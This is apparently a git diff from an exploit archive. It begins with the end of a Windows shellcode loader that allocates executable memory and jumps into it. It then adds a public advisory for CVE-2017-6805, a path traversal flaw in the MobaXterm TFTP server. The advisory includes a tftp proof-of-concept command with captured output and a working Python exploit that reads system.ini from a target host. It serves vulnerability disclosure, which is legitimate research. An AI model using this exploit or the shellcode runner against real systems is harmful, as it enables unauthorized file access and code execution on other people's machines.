char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
memcpy(BUFFER, Shellcode, sizeof(Shellcode));
|
||||
(*(void(*)())BUFFER)();
|
||||
}
|
||||
|
||||
|
125
platforms/windows/remote/41592.txt
Executable file
125
platforms/windows/remote/41592.txt
Executable file
|
@ -0,0 +1,125 @@
|
|||
[+] Credits: John Page AKA hyp3rlinx
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
|
||||
Vendor:
|
||||
=====================
|
||||
mobaxterm.mobatek.net
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
===============================
|
||||
MobaXterm Personal Edition v9.4
|
||||
|
||||
Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more.
|
||||
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=====================================
|
||||
Path Traversal Remote File Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
CVE-2017-6805
|
||||
|
||||
|
||||
|
||||
Security Issue:
|
||||
================
|
||||
Remote attackers can use UDP socket connection to TFTP server port 69 and send Read request, to retrieve otherwise protected files using
|
||||
directory traversal attacks e.g. ../../../../Windows/system.ini
|
||||
|
||||
Start MobaXterm TFTP server which listens on default TFTP port 69.
|
||||
|
||||
c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini
|
||||
Transfer successful: 219 bytes in 1 second(s), 219 bytes/s
|
||||
|
||||
c:\xampp\htdocs>type system.ini
|
||||
; for 16-bit app support
|
||||
[386Enh]
|
||||
woafont=dosapp.fon
|
||||
EGA80WOA.FON=EGA80WOA.FON
|
||||
EGA40WOA.FON=EGA40WOA.FON
|
||||
CGA80WOA.FON=CGA80WOA.FON
|
||||
CGA40WOA.FON=CGA40WOA.FON
|
||||
|
||||
[drivers]
|
||||
wave=mmdrv.dll
|
||||
timer=timer.drv
|
||||
|
||||
[mci]
|
||||
|
||||
Victim Data located on: 127.0.0.1
|
||||
|
||||
|
||||
|
||||
POC URL:
|
||||
=============================
|
||||
https://vimeo.com/207516364
|
||||
|
||||
|
||||
|
||||
|
||||
Exploit:
|
||||
==========
|
||||
|
||||
import sys,socket
|
||||
|
||||
print 'MobaXterm TFTP Directory Traversal 0day Exploit'
|
||||
print 'Read Windows/system.ini'
|
||||
print 'hyp3rlinx \n'
|
||||
|
||||
HOST = raw_input("[IP]>")
|
||||
FILE = 'Windows/system.ini'
|
||||
PORT = 69
|
||||
|
||||
PAYLOAD = "\x00\x01" #TFTP Read
|
||||
PAYLOAD += "../" * 4 + FILE + "\x00" #Read system.ini using directory traversal
|
||||
PAYLOAD += "netascii\x00" #TFTP Type
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
s.sendto(PAYLOAD, (HOST, PORT))
|
||||
out = s.recv(1024)
|
||||
s.close()
|
||||
|
||||
print "Victim Data located on : %s " %(HOST)
|
||||
print out.strip()
|
||||
|
||||
|
||||
|
||||
Network Access:
|
||||
===============
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity:
|
||||
=========
|
||||
High
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=============================
|
||||
Vendor Notification: No Reply
|
||||
March 10, 2017 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
Loading…
Add table
Reference in a new issue